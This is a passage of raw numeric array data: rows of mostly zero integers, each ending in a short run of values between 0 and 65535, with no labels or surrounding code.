[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 41860, 10817, 48614, 56070, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 29952, 25920, 16208, 45652, 12149, 8358],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 2692, 16705, 10982, 22534, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 58880, 59776, 20064, 13976, 50662, 28065],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 29060, 22593, 38886, 54534, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 21184, 28336, 10540, 64363, 4856],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 55428, 28481, 1254, 20998, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 50432, 51520, 23632, 43668, 18139],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 16260, 34369, 29158, 52998, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 12544, 13376, 64272, 8004, 34097, 26426],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 42628, 40257, 57062, 19462, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 20992, 42112, 9504, 16968, 13650, 33989],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 3460, 46145, 19430, 51462, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 18176, 27072, 15472, 27292, 21063, 35308],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 29828, 52033, 47334, 17926, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 39424, 63104, 47520, 11743],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 56196, 57921, 9702, 49926, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 11520, 21312, 51920, 45364, 7213, 41870],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 17028, 63809, 37606, 16390, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 65024, 61312, 40928, 38648, 52990, 46249],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 43396, 4161, 65510, 48390, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 25344, 20672, 32304, 59660, 12387, 47264],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 4228, 10049, 27878, 14854, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 6912, 61120, 53680, 12524, 38819],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 30596, 15937, 55782, 46854, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 26880, 49728, 28304, 55332, 53353, 51618],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 56964, 21825, 18150, 13318, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 59904, 51840, 32416, 25768, 40682, 333],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 17796, 27713, 46054, 45318, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 48896, 1984, 62448, 38012, 37311, 62228],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 44164, 33601, 8422, 11782, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 56832, 34688, 40416, 48248, 26663],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 4996, 39489, 36326, 43782, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 58624, 33088, 42576, 1044, 48613, 36214],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 31364, 45377, 64230, 10246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 5632, 13696, 33120, 56152, 61718, 11953],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 57732, 51265, 26598, 42246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 23296, 36544, 23984, 23788, 45659, 19784],
